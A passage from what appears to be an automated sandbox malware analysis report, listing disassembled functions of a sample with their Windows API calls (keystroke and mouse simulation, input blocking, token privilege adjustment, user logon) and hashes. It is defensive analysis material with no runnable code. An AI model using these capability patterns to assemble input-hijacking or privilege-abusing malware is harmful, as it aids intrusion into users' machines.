                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                        • String ID:
                                                                        • API String ID: 3429775523-0
                                                                        • Opcode ID: c5d5750b55c1464d90f6bd4683d83750b0c3a8954ca27e13a6f27b9d4a88dd4b
                                                                        • Instruction ID: 0c9ff54a3285571a4b66fe0b3b72b0ba01694c9e5e97d91f728ff69935aa8dfb
                                                                        • Opcode Fuzzy Hash: c5d5750b55c1464d90f6bd4683d83750b0c3a8954ca27e13a6f27b9d4a88dd4b
                                                                        • Instruction Fuzzy Hash: 31F01D76A14209BFDF04DFE5DD89EFEBBBAEF48305F104469A602E2191E6709A44DB10
                                                                        Function 00EBF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EBF599
                                                                        • FindClose.KERNEL32(00000000), ref: 00EBF5C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: 370b096a05558100d73a65be5d1b59f4f37171d7731823726ce9f11a8aa9d317
                                                                        • Instruction ID: d1943b0935dda04bc32378089aed452855b7ebcaa878970f84b817c16ac8f028
                                                                        • Opcode Fuzzy Hash: 370b096a05558100d73a65be5d1b59f4f37171d7731823726ce9f11a8aa9d317
                                                                        • Instruction Fuzzy Hash: AC115B726046009FD710EF29D845A6EB7E9FF84324F00895EF9A9A7291DB30AD058B81
                                                                        Function 00EBCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00ECBE6A,?,?,00000000,?), ref: 00EBCEA7
                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00ECBE6A,?,?,00000000,?), ref: 00EBCEB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFormatLastMessage
                                                                        • String ID:
                                                                        • API String ID: 3479602957-0
                                                                        • Opcode ID: c7dc904668a89f697780e41fe6a5c4a59682f6d0abde8ad96182c53610ace8a3
                                                                        • Instruction ID: a3dc1fc5c13b3322506316506c0494d7e7590f4a73e8afa8f8a97f8b50aaf5d4
                                                                        • Opcode Fuzzy Hash: c7dc904668a89f697780e41fe6a5c4a59682f6d0abde8ad96182c53610ace8a3
                                                                        • Instruction Fuzzy Hash: 0DF08231504229FBDB209BA4DC89FFA776DFF08361F008166F919E6191D630DA44CBA1
                                                                        Function 00EB411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00EB4153
                                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00EB4166
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: InputSendkeybd_event
                                                                        • String ID:
                                                                        • API String ID: 3536248340-0
                                                                        • Opcode ID: d3ce56f7d19195b4d6a146245c43679a1113c1817a87f2f52b1b72466a4850ef
                                                                        • Instruction ID: 269b2cbb4714c7d3235d3eb6c3eaf315e47118fd57b038b5633c4416e4258439
                                                                        • Opcode Fuzzy Hash: d3ce56f7d19195b4d6a146245c43679a1113c1817a87f2f52b1b72466a4850ef
                                                                        • Instruction Fuzzy Hash: 5CF0177090824DAFDB059FA5CC05BFE7FB4EF04309F04840AF966A6192D7798616DFA4
                                                                        Function 00EAAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EAACC0), ref: 00EAAB99
                                                                        • CloseHandle.KERNEL32(?,?,00EAACC0), ref: 00EAABAB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 81990902-0
                                                                        • Opcode ID: 45147cbe3d71d5468b1bcce2762014da99f731c2665c065b09f091e6411683e2
                                                                        • Instruction ID: 77b53b583c8cd305f2e6c8c1de51aa902c6322da382357cc8ee7328c8f9c4c27
                                                                        • Opcode Fuzzy Hash: 45147cbe3d71d5468b1bcce2762014da99f731c2665c065b09f091e6411683e2
                                                                        • Instruction Fuzzy Hash: 83E0EC72004610AFE7252F65EC09D77BBEAEF48321B208829F99E91470DB62AD94DB50
                                                                        Function 00E981AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00E96DB3,-0000031A,?,?,00000001), ref: 00E981B1
                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E981BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 21cf091c5bd6584db31ec9b5d771a6ba59d9057d3275a0739347c46c7b1f9f3f
                                                                        • Instruction ID: ead7d9c006284cd2332c24df2dcaeb6a8c752fb30a17cbbe0ac43f156e2cb83a
                                                                        • Opcode Fuzzy Hash: 21cf091c5bd6584db31ec9b5d771a6ba59d9057d3275a0739347c46c7b1f9f3f
                                                                        • Instruction Fuzzy Hash: 4BB0923204D608AFDB002BA2EC09B6C7F6AEB88662F404010F70D540A18B725524DA92
                                                                        Function 00E777B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: e5f965c2476177899d556544eb500ebf1a31a30fb8b77a645e30e7138a2dcc34
                                                                        • Instruction ID: e4f68c88df137769e54bf4d211833446e9cc20d68e6a94c219f72b677c1d158a
                                                                        • Opcode Fuzzy Hash: e5f965c2476177899d556544eb500ebf1a31a30fb8b77a645e30e7138a2dcc34
                                                                        • Instruction Fuzzy Hash: E7A23971A04219CFDB24CF58C8806ADBBB1FF58314F2591AAD999BB391D7309E81DF90
                                                                        Function 00E83B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                        • String ID: @
                                                                        • API String ID: 3728558374-2766056989
                                                                        • Opcode ID: e873faf23805a1173859f1541d821a310f95805bb5faaf63cc13da6029abfa4c
                                                                        • Instruction ID: 04277dcb99f98399c0e0dc7b85f0206cfcf89becf464ef9b207299c1d931426a
                                                                        • Opcode Fuzzy Hash: e873faf23805a1173859f1541d821a310f95805bb5faaf63cc13da6029abfa4c
                                                                        • Instruction Fuzzy Hash: 05729C70E042099FCF14EFA4C881AEEB7B5EF48704F24905AE94DBB291D771AE45CB91
                                                                        Function 00E9D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 796d7007418a0579e2d38bc4fa170dae73dd48ef80f3fbc1e7b4901ae1ab0d7c
                                                                        • Instruction ID: b7964d7cd16fed86a2e1444d0d2bc78dccf0438b70f90699dc46876d4f8cba9a
                                                                        • Opcode Fuzzy Hash: 796d7007418a0579e2d38bc4fa170dae73dd48ef80f3fbc1e7b4901ae1ab0d7c
                                                                        • Instruction Fuzzy Hash: 8B323522D29F154DDB639634CD26335A289FFB73C4F15E737E819B5AAAEB28C4835100
                                                                        Function 00E796C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 674341424-0
                                                                        • Opcode ID: 480c561c9856757a20b14221bc6344bdaeca895d5b9bac252f88d0c9d8b35a06
                                                                        • Instruction ID: a88c27c9bda8715f6b8f9e492ec7587a011b4b0acec40702c1c208940059d542
                                                                        • Opcode Fuzzy Hash: 480c561c9856757a20b14221bc6344bdaeca895d5b9bac252f88d0c9d8b35a06
                                                                        • Instruction Fuzzy Hash: B3229B715083419FD724DF24C891BAFB7E4EF84314F10A91DF99AAB292DB71E905CB82
                                                                        Function 00EA038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 343b6a984a88c079e5ddd1e64162ef4418d1dc5c58d0c37f63e87920c52b2132
                                                                        • Instruction ID: 45515dac3dae392b93e227250daf0912cff0706acd070883dafac28e6f7992f1
                                                                        • Opcode Fuzzy Hash: 343b6a984a88c079e5ddd1e64162ef4418d1dc5c58d0c37f63e87920c52b2132
                                                                        • Instruction Fuzzy Hash: 8EB1F120D2AF454DD2239639883533BBA9CBFBB6D5F91D71BFC1A74D22EB2181835580
                                                                        Function 00EBB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __time64.LIBCMT ref: 00EBB6DF
                                                                          • Part of subcall function 00E9344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00EBBDC3,00000000,?,?,?,?,00EBBF70,00000000,?), ref: 00E93453
                                                                          • Part of subcall function 00E9344A: __aulldiv.LIBCMT ref: 00E93473
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                        • String ID:
                                                                        • API String ID: 2893107130-0
                                                                        • Opcode ID: bd8b5d0a5114ccfafc3759ddc3299ce2f181be18fca4c19a3eb9bb7cc8955b8b
                                                                        • Instruction ID: ed6e05c0f3ede4cc06dfebe2c43665de38e7a4f15eda1e09f3f3b449c728f263
                                                                        • Opcode Fuzzy Hash: bd8b5d0a5114ccfafc3759ddc3299ce2f181be18fca4c19a3eb9bb7cc8955b8b
                                                                        • Instruction Fuzzy Hash: 76218172634510CBC729CF38C881A92B7E1EB95321B248E7DE4E5CB2C0CB78BA05DB54
                                                                        Function 00EC6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • BlockInput.USER32(00000001), ref: 00EC6ACA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BlockInput
                                                                        • String ID:
                                                                        • API String ID: 3456056419-0
                                                                        • Opcode ID: 917abd0e2f9bfb4e69a431552c8cd755c719d91aa8c17e3375f4553cae34cf2a
                                                                        • Instruction ID: bfb0c86e73e0db75efa2bd1d273f11ac2437eb899e772c9271c11a4caf4791e0
                                                                        • Opcode Fuzzy Hash: 917abd0e2f9bfb4e69a431552c8cd755c719d91aa8c17e3375f4553cae34cf2a
                                                                        • Instruction Fuzzy Hash: 05E048352042046FC700EF99D904E96F7EDEFB4755F04D41AF949E7251DAB1F8058B90
                                                                        Function 00EB74E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00EB750A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: mouse_event
                                                                        • String ID:
                                                                        • API String ID: 2434400541-0
                                                                        • Opcode ID: 4ee9ed963251e82640283418b22336d531a2389739f259bac3a7811625fcefdf
                                                                        • Instruction ID: 2e5dee5a6a1a92f4963f40d5b90a15aabad11ccfade1824daf6870dde8b9a220
                                                                        • Opcode Fuzzy Hash: 4ee9ed963251e82640283418b22336d531a2389739f259bac3a7811625fcefdf
                                                                        • Instruction Fuzzy Hash: 54D09EA416D60A79EC2A07249C1BFF71909F3C0786FD46549F6D7FD8C0A8D45E05E031
                                                                        Function 00EAB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EAAD3E), ref: 00EAB124
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LogonUser
                                                                        • String ID:
                                                                        • API String ID: 1244722697-0
                                                                        • Opcode ID: 67c25001d74328de964288d493ef3e56a25f80ec33bb88258deb4d7de648ee46
                                                                        • Instruction ID: 7aa457e647e72b3d8c1914541f3821e694bca5c7bdc726adcb8fc8a6466e5d29
                                                                        • Opcode Fuzzy Hash: 67c25001d74328de964288d493ef3e56a25f80ec33bb88258deb4d7de648ee46
                                                                        • Instruction Fuzzy Hash: 25D05E320A460EAEDF024FA4DC02EBE3F6AEB04700F408110FA11D50A0C671D531EB50
                                                                        Function 00EEB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: f9a20a01f7ccc3e2f0c6d5e582f2bd01d35b520002ca5313a3aad56611a1798c
                                                                        • Instruction ID: 0dd3178808021f822dd47fee4fce10bbe4a4345f1a75df8c8108737ffe660cae
                                                                        • Opcode Fuzzy Hash: f9a20a01f7ccc3e2f0c6d5e582f2bd01d35b520002ca5313a3aad56611a1798c
                                                                        • Instruction Fuzzy Hash: 5BC04CB140414DDFC751CBC1CD449EEB7BDAB04301F2450959105F1110DB709B45DB72
                                                                        Function 00E98189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E9818F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 57030acf0c9f07d4ec486c094cea3cf35199045d720978115cdae2f7c96af7f8
                                                                        • Instruction ID: b4325ee8434148fd20ddccf7f2348ed459468b9ac24d69bfa36667f81eea26b7
                                                                        • Opcode Fuzzy Hash: 57030acf0c9f07d4ec486c094cea3cf35199045d720978115cdae2f7c96af7f8
                                                                        • Instruction Fuzzy Hash: 70A0113200820CAB8F002B82EC088A83F2EEB802A0B000020FA0C000208B22AA20AA82
                                                                        Function 00E7E3B0 Relevance: .5, Instructions: 540COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1249aec8149a5967857c41f1002a5c40b5034a39209ccd41f8bcc8a465b60b7
                                                                        • Instruction ID: a04e2387995007179cafe43e1473808a05bd0f83a304ed759503acf69c476f58
                                                                        • Opcode Fuzzy Hash: e1249aec8149a5967857c41f1002a5c40b5034a39209ccd41f8bcc8a465b60b7
                                                                        • Instruction Fuzzy Hash: 43229F709042098FDB24DF98C490AAAB7F1FF18318F14D1A9E99EBB351E771AD41CB91
                                                                        Function 00E793F0 Relevance: .5, Instructions: 531COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
